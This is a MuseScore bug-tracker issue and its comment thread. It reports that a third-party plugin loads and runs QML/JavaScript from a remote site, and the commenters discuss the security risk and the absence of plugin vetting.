Dangerous remote code loading
Reported version
3.2
Priority
P0 - Critical
Type
Functional
Frequency
Once
Severity
S2 - Critical
Reproducibility
Always
Status
active
Regression
No
Workaround
No
Look at the plugin code: this plugin does nothing more than load QML/JavaScript code from a remote site and then call an entry function in this code. While the code currently downloaded seems harmless this remote code execution opens up a local MuseScore instance to all sorts of exploits (and why would you need to download code from a remote site instead of deploying it with the plugin file?).
The overall look of the musicalion website makes that whole procerdure even more dubious - no impressum, no contact, no DSVG-required information.
Comments
There is an Impressum (and even in German): https://www.musicalion.com/de/scores/site/info/imprint
In reply to There is an Impressum (and… by Jojo-Schmitz
Not in my browser window (but I found it in the page source).
Still - extremely dangerous to live-download code.
scroll down, hover over the footer (works in Edge)
I agree with you on the danger of loading code from the web...
In reply to scroll down, hover over the… by Jojo-Schmitz
This seems very high priority.
Why is this kind of downloading permitted at all in the MS QML repertoire?
The source for that download is at https://www.musicalion.com/ser/muse-score-plugin/get
A plugin only works if you manually add the plugin to begin with, right?
And when you do so, the plugin comes from Internet ?
So for any plugin running it "runs code from Internet"...
Ok if the plugin doesn't life download codes, it is a code that you can review before using it.
But which "normal" user does that?
So aren't all plugins "dangerous code from Internet"?
You can inspect the plugin god prior to installed and running it, you can't with this one. Even if you can now, via that URL above, the code sent from there might change any minute (and already might, depending on the current date, as that is passed as an argument to the server)
In reply to You can inspect the plugin… by Jojo-Schmitz
I repeat, why is network code loading by code supported? Is there no vetting of code linked to on the plugins page? Is a more vetting-intensive path called for?
No, there is no such vetting.
In reply to No, there is no such vetting. by Jojo-Schmitz
Can QML read (other than import) or write files or exfiltrate date to the net?
In reply to This seems very high… by xavierjazz
After someone removed that initial post yesterday the plugin code was added to this site again today. Hmmm.
Seems that the plugin https://musescore.org/en/project/musicalion-upload-manager got removed and reinstated as https://musescore.org/en/project/musicalion-upload-manager-0.
Came up again in https://musescore.org/en/node/295642#comment-952638 ff.